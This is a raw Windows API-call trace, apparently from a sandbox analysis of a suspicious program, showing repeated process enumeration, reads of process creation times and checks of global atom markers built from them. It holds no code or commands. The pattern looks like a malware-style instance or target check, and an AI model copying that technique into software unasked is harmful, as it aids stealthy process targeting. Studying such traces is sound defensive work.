	[0099.324] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.324] CloseHandle (hObject=0x36c) returned 1
	[0099.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0099.324] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.324] CloseHandle (hObject=0x36c) returned 1
	[0099.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0099.324] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.324] CloseHandle (hObject=0x36c) returned 1
	[0099.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0099.324] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.324] CloseHandle (hObject=0x36c) returned 1
	[0099.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0099.325] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.325] CloseHandle (hObject=0x36c) returned 1
	[0099.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0099.325] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.325] CloseHandle (hObject=0x36c) returned 1
	[0099.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0099.325] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.325] CloseHandle (hObject=0x36c) returned 1
	[0099.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0099.325] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.325] CloseHandle (hObject=0x36c) returned 1
	[0099.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0099.326] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.326] CloseHandle (hObject=0x36c) returned 1
	[0099.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0099.326] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.326] CloseHandle (hObject=0x36c) returned 1
	[0099.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0099.326] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.326] CloseHandle (hObject=0x36c) returned 1
	[0099.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0099.326] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.326] CloseHandle (hObject=0x36c) returned 1
	[0099.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0099.326] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.326] CloseHandle (hObject=0x36c) returned 1
	[0099.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0099.327] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.327] CloseHandle (hObject=0x36c) returned 1
	[0099.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0099.327] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.327] CloseHandle (hObject=0x36c) returned 1
	[0099.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0099.327] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.327] CloseHandle (hObject=0x36c) returned 1
	[0099.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0099.327] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.327] CloseHandle (hObject=0x36c) returned 1
	[0099.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0099.328] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.328] CloseHandle (hObject=0x36c) returned 1
	[0099.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0099.328] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.328] CloseHandle (hObject=0x36c) returned 1
	[0099.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0099.328] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.328] CloseHandle (hObject=0x36c) returned 1
	[0099.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0099.328] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.328] CloseHandle (hObject=0x36c) returned 1
	[0099.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0099.328] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.328] CloseHandle (hObject=0x36c) returned 1
	[0099.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0099.329] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.329] CloseHandle (hObject=0x36c) returned 1
	[0099.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0099.329] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.329] CloseHandle (hObject=0x36c) returned 1
	[0099.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0099.329] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.329] CloseHandle (hObject=0x36c) returned 1
	[0099.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0099.330] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.330] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.330] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.330] wsprintfA (in: param_1=0x6773c0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.330] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.330] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.330] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.331] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.331] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.331] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.331] CloseHandle (hObject=0x36c) returned 1
	[0099.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0099.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x36c
	[0099.331] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.331] CloseHandle (hObject=0x36c) returned 1
	[0099.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x36c
	[0099.331] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.331] CloseHandle (hObject=0x36c) returned 1
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x37c
	[0099.389] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.389] CloseHandle (hObject=0x37c) returned 1
	[0099.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x37c
	[0099.390] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.390] CloseHandle (hObject=0x37c) returned 1
	[0099.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x37c
	[0099.390] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.390] CloseHandle (hObject=0x37c) returned 1
	[0099.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x37c
	[0099.390] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.390] CloseHandle (hObject=0x37c) returned 1
	[0099.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x37c
	[0099.390] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.390] CloseHandle (hObject=0x37c) returned 1
	[0099.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x37c
	[0099.391] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.391] CloseHandle (hObject=0x37c) returned 1
	[0099.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x37c
	[0099.391] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.391] CloseHandle (hObject=0x37c) returned 1
	[0099.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x37c
	[0099.391] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.391] CloseHandle (hObject=0x37c) returned 1
	[0099.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x37c
	[0099.391] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.391] CloseHandle (hObject=0x37c) returned 1
	[0099.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x37c
	[0099.392] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.392] CloseHandle (hObject=0x37c) returned 1
	[0099.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x37c
	[0099.392] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.392] CloseHandle (hObject=0x37c) returned 1
	[0099.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x37c
	[0099.392] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.392] CloseHandle (hObject=0x37c) returned 1
	[0099.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x37c
	[0099.392] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.392] CloseHandle (hObject=0x37c) returned 1
	[0099.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x37c
	[0099.392] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.392] CloseHandle (hObject=0x37c) returned 1
	[0099.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x37c
	[0099.393] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.393] CloseHandle (hObject=0x37c) returned 1
	[0099.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x37c
	[0099.393] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.393] CloseHandle (hObject=0x37c) returned 1
	[0099.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x37c
	[0099.393] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.393] CloseHandle (hObject=0x37c) returned 1
	[0099.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x37c
	[0099.393] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.393] CloseHandle (hObject=0x37c) returned 1
	[0099.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x37c
	[0099.393] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.393] CloseHandle (hObject=0x37c) returned 1
	[0099.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x37c
	[0099.394] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.394] CloseHandle (hObject=0x37c) returned 1
	[0099.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x37c
	[0099.394] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.394] CloseHandle (hObject=0x37c) returned 1
	[0099.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x37c
	[0099.394] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.394] CloseHandle (hObject=0x37c) returned 1
	[0099.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x37c
	[0099.394] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.394] CloseHandle (hObject=0x37c) returned 1
	[0099.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x37c
	[0099.394] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.394] CloseHandle (hObject=0x37c) returned 1
	[0099.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x37c
	[0099.395] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.395] CloseHandle (hObject=0x37c) returned 1
	[0099.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x37c
	[0099.395] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.395] CloseHandle (hObject=0x37c) returned 1
	[0099.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x37c
	[0099.395] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.395] CloseHandle (hObject=0x37c) returned 1
	[0099.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x37c
	[0099.395] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.395] CloseHandle (hObject=0x37c) returned 1
	[0099.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x37c
	[0099.396] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.396] CloseHandle (hObject=0x37c) returned 1
	[0099.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x37c
	[0099.396] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.396] CloseHandle (hObject=0x37c) returned 1
	[0099.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x37c
	[0099.396] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.396] CloseHandle (hObject=0x37c) returned 1
	[0099.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x37c
	[0099.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.397] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.397] GetProcessTimes (in: hProcess=0x37c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.397] wsprintfA (in: param_1=0x679068, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.397] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.397] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.397] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.398] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.398] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.398] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.398] CloseHandle (hObject=0x37c) returned 1
	[0099.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0099.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x37c
	[0099.398] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.398] CloseHandle (hObject=0x37c) returned 1
	[0099.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x37c
	[0099.399] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.399] CloseHandle (hObject=0x37c) returned 1
	[0099.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0099.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0099.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0099.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0099.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0099.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0099.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0099.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0099.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0099.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0099.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0099.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x37c
	[0099.496] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.496] CloseHandle (hObject=0x37c) returned 1
	[0099.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0099.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0099.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x37c
	[0099.497] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.497] CloseHandle (hObject=0x37c) returned 1
	[0099.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0099.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x37c
	[0099.497] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.497] CloseHandle (hObject=0x37c) returned 1
	[0099.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x37c
	[0099.497] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.497] CloseHandle (hObject=0x37c) returned 1
	[0099.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x37c
	[0099.497] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.498] CloseHandle (hObject=0x37c) returned 1
	[0099.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x37c
	[0099.498] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.498] CloseHandle (hObject=0x37c) returned 1
	[0099.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x37c
	[0099.498] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.498] CloseHandle (hObject=0x37c) returned 1
	[0099.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x37c
	[0099.498] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.498] CloseHandle (hObject=0x37c) returned 1
	[0099.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0099.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x37c
	[0099.498] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.499] CloseHandle (hObject=0x37c) returned 1
	[0099.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x37c
	[0099.499] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.499] CloseHandle (hObject=0x37c) returned 1
	[0099.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x37c
	[0099.499] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.499] CloseHandle (hObject=0x37c) returned 1
	[0099.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x37c
	[0099.499] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.499] CloseHandle (hObject=0x37c) returned 1
	[0099.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x37c
	[0099.499] IsWow64Process (in: hProcess=0x37c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.499] CloseHandle (hObject=0x37c) returned 1
